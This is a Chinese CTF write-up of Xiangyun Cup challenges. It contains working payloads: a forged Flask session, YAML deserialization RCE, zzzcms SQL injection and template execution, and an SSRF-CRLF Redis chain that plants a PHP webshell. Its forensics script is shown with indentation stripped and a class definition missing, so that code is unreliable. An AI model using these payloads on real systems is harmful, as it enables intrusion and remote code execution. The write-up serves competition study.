11月各种比赛WP

祥云杯

有好多题当时都没做出来，现在理一遍思路复现下WP。

web

profile system

/uploads/../app.py 读到源码 用 SECRET_KEY 伪造 session 绕过验证 yaml 反序列化 RCE

python3 flask_session_cookie_manager3.py encode -s Th1s_is_A_Sup333er_s1cret_k1yyyyy -t '{"filename":"test.yml","priviledge":"elite"}'

eyJmaWxlbmFtZSI6InRlc3QueW1sIiwicHJpdmlsZWRnZSI6ImVsaXRlIn0.X7oK1Q.b9SGCKpOuDDmD0BEu0heUa97qU8

exp: !!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ "\x5f\x5fimport\x5f\x5f('os')\x2esystem('/readflag\x3e\x3e/proc/self/cwd/uploads/wwww')" ]]] 访问 wwww 即可。

easyzzzz

注入 admin 密码：https://github.com/h4ckdepy/zzzphp/issues/1 form/index.php?module=getjson table=gbook&where[]=1=1 union select password from zzz_user&col=1 zzzcms(php) v1.7.5 前台SQL注入：https://xz.aliyun.com/t/7414 新版本后台模版代码执行有新的过滤，{if:1=1);echo cat /flag;//}{end if} 绕过即可

doyouknowssrf

ssrf + urllib crlf 打 redis 写 shell

url=http://@127.0.0.1:5000@www.baidu.com/%3f%75%72%6c%3d%68%74%74%70%
3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%37%39%2f%3f%61%3
d%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%64%25%30%61%58%2
d%69%6e%6a%65%63%74%65%64%3a%25%32%30%68%65%61%64%65%72%61%2
5%30%64%25%30%61%25%32%41%31%25%30%44%25%30%41%25%32%34%38%
25%30%44%25%30%41%66%6c%75%73%68%61%6c%6c%25%30%44%25%30%41%
25%32%41%33%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41
%73%65%74%25%30%44%25%30%41%25%32%34%31%25%30%44%25%30%41%3
1%25%30%44%25%30%41%25%32%34%33%31%25%30%44%25%30%41%25%30%
41%25%30%41%25%33%43%25%33%46%70%68%70%25%32%30%73%79%73%74
%65%6d%25%32%38%25%32%34%5f%47%45%54%25%35%42%25%32%37%63%25
%32%37%25%35%44%25%32%39%25%33%42%25%33%46%25%33%45%25%30%4
1%25%30%41%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%
25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%
30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30
%41%25%32%34%33%25%30%44%25%30%41%64%69%72%25%30%44%25%30%4
1%25%32%34%31%33%25%30%44%25%30%41%2f%76%61%72%2f%77%77%77%2f
%68%74%6d%6c%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41
%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25
%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%3
0%41%25%32%34%31%30%25%30%44%25%30%41%64%62%66%69%6c%65%6e%6
1%6d%65%25%30%44%25%30%41%25%32%34%39%25%30%44%25%30%41%73%
68%65%6c%6c%2e%70%68%70%25%30%44%25%30%41%25%32%41%31%25%30%
44%25%30%41%25%32%34%34%25%30%44%25%30%41%73%61%76%65%25%30
%44%25%30%41%25%30%41

flaskbot

输入 nan 赢游戏，用户名 ssti 读 log 文件拿到 pin，console 直接 rce 读 flag 即可

misc

到点了

解压得到3个 word 文档，1.docx 里面只有一张图片，2.docx 有密码，3.docx 除了有一张图片用 binwalk 还额外分离出一张 4.bmp 的图片（这里感觉是解开 2.docx 的关键所在），使用各种办法看各种图片和文档的隐写还是没有做出来，可能方向有问题？？

xixixi

运行直接生成了一个新的磁盘，里面只有一张只露出一小行的图片，翻了翻还发现了两个 python 脚本 xi.py 和 xixi.py，参考这两个脚本写代码恢复图片即可：

import struct
# with open('new.vhd', 'rb') as f:
# 	content = f.read()
# res = content.split(b'\x00'*128)
# rres = []
# for i in res:
# 	if i:
# 		rres.append(i.strip('\x00'))
# parts = []
# for idx, val in enumerate(rres):
# 	if 'IHDR' in val:
# 		print(idx, len(val))
# if len(val) > 0 and len(val) % 512 == 0 and val[-1] == '\xff':
# 	parts.append(val.rstrip('\xff'))
# print(len(parts))
# print(rres[73])
# print('='*50)
# print('='*50)

def GetDBRoff(self):
DPT_off = 0x1BE
target = self.diskData[DPT_off+8:DPT_off+12]
DBR_sector_off, = struct.unpack("<I", target)
return DBR_sector_off * 512

def GetFAT1off(self):
target = self.diskData[self.DBR_off+0xE:self.DBR_off+0x10]
FAT1_sector_off, = struct.unpack("<H", target)
return self.DBR_off + FAT1_sector_off * 512

def GetFATlength(self):
target = self.diskData[self.DBR_off+0x24:self.DBR_off+0x28]
FAT_sectors, = struct.unpack("<I", target)
return FAT_sectors * 512

def GetRootoff(self):
FAT_length = self.GetFATlength()
FAT2_off = self.GetFAT1off() + FAT_length
return FAT2_off + FAT_length

def Cluster2FAToff(self, cluster):
FAT1_off = self.GetFAT1off()
return FAT1_off + cluster * 4

def Cluster2DataOff(self, cluster):
rootDir_off = self.GetRootoff()
return rootDir_off + (cluster - 2) * 512

output = open('flag.png', 'wb')

parser = FAT32Parser('new.vhd')

data_off = 0x027bae00
data_length = 9728
data_sector = parser.diskData[data_off:data_off+data_length].rstrip('\xff')
cluster_bytes = data_sector[-4:]
output.write(data_sector)

cluster = struct.unpack("<I", cluster_bytes)[0]
for _ in range(57):
fat_off = parser.Cluster2FAToff(cluster)
data_length = 0
while True:
tmp = parser.diskData[fat_off:fat_off+4]
if tmp == '\xff\xff\xff\x0f':
data_length += 512
fat_off += 4
else:
break
data_off = parser.Cluster2DataOff(cluster)
data_sector = parser.diskData[data_off:data_off+data_length].rstrip('\xff')
key = cluster & 0xfe
decrypted_data = ''
for i in data_sector:
decrypted_data += chr(ord(i) ^ key)
cluster_bytes = decrypted_data[-4:]
output.write(decrypted_data)
cluster = struct.unpack("<I", cluster_bytes)[0]

output.close()

参考自Nu1L团队的WP